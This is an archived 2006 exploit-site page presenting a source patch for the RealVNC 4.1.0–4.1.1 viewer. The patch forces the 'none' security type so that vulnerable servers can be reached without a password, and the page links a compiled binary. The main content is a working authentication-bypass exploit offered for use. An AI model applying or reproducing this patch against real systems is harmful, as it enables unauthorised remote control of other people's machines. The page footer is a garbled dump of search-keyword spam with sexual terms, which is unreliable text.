about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , VNC 4.1.0 - 4.1.1 (VNC Null Authentication) Auth Bypass Patch with EXE




2006-05-16 VNC 4.1.0 - 4.1.1 (VNC Null Authentication) Auth Bypass Patch with EXE 
Rated  as : Critical
xx  vnc-4_1_1-unixsrc.bl4ck/common/rfb/CConnection.cxx
--- vnc-4_1_1-unixsrc/common/rfb/CConnection.cxx        2005-03-11
09:08:41.000000000 -0600
+++ vnc-4_1_1-unixsrc.bl4ck/common/rfb/CConnection.cxx  2006-05-15
14:03:30.000000000 -0500
@@ -183,7 +183,12 @@

     // Inform the server of our decision
     if (secType != secTypeInvalid) {
-      os->writeU8(secType);
+
+      // [BL4CK] In response to the VNC Null Authentication
+      // force a secType to equal secTypeNone
+      // http://blacksecurity.org
+      secType = secTypeNone;
+      os->writeU8(secTypeNone);
       os->flush();
       vlog.debug("Choosing security type
%s(%d)",secTypeName(secType),secType);     }

Compiled:
http://www.milw0rm.com/sploits/05162006-BL4CK-vncviewer-authbypass.rar
securitydot.net - 2006-05-16

Advertising

Copyright 2007, SecurityDot
Sun, 22 Nov 2009 00:44:50 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
bbotycentr www.sex oc GET+%252Fg schoolsexv MS06-019 Crack Data www.gby-se mambo Remo Linux+2.6. RegCure li o my goody MyClassifi Free Anti WWW.FREESE fcgi www.yiqiya modules/vw phpbb 2.02 World cup mambo Remo mambo Remo Linux+2.6. Kerala fuc +allinurl: www.videos news for C k-rad www.tuwen1 http:/www. Anna persl d3dx9_43.d mambo Remo http:/busc www.taohao Mallu+hot+ www.live98 wetch sxe Properties www.live98 sql mambo Remo exploits p PORNICI katrina ka www world exploits p PORNICI Www.sexved www.goozoo vedeosex f